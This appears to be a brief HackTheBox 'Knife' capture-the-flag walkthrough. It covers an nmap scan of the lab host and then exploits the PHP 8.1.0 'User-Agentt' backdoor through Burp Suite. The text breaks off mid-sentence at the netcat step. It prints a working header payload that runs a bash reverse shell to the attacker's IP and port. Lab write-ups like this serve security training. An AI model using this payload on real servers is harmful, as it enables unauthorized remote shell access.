HackTheBox : Knife Walkthrough
Concepts Learnt : Enumeration 2. Burp Suite 3. PHP Vulnerability 4. Ruby (Knife) Steps to Enumerate : Run an Nmap Scan to find all the open ports! Command : nmap 10.10.10.242 -A 10.10.10.242 IP of the Server -A This options makes Nmap make an effort in identifying the target OS,services and the versions. It also does traceroute and applies NSE scripts to detect additional information. -vv Defines level 2 verbosity for the scan We see that there are 2 ports open : 22/tcp- SSH port 80/tcp- HTTP port Lets check the http site on port 80: It is a simple site with no clickable elements! We can see that PHP version is 8.1.0 which is vulnerable to user agentt RCE Let run the site through burp suite and exploit Capture using the proxy! Now pass it through the repeater and use the RCE code to execute! Command: User-Agentt: zerodiumsystem(“/bin/bash -c ‘bash -i >& /dev/tcp/ip/port 0>&1’”); Add your IP and port in the command above before executing! Now run the netcat list